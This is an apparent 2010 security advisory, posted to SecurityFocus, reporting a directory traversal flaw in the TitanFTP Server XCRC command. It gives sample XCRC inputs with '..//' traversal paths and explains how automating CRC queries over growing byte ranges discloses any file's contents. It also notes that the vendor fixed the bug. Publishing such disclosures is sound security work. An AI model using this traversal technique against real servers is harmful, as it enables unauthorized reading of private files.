TitanFTP Server Arbitrary File Disclosure Jun 15 2010 10:06PM
bill accensussecurity com
Accensus Security Advisory L-02 TitanFtp Server Arbitrary File Disclosure



Product: TitanFTP Server

Security-Risk: high

Remote-Exploit: maybe, assuming anonymous ftp access

Local-Exploit: yes

Vendor URL: http://www.southrivertech.com/

Found By: Bill Finlayson


Affected: Versions 8.10.1125 and likely previous

Issue: the xcrc command is susceptible to a directory traversal attack which will allow disclosure of the contents of any file on the server

Details: xcrc ..//..//..//..//a.txt 1 <some huge number> will disclose the file's size

xcrc ..//..//..//..//a.txt 1 2

xcrc ..//..//..//..//a.txt 1 3


xcrc ..//..//..//..//a.txt 1 <filesize>

when automated allows for an easy brute force attack on the crc's

Status: Submitted to Vendor 6/14/10 fixed 6/15/10

[ reply ]


Privacy Statement
Copyright 2010, SecurityFocus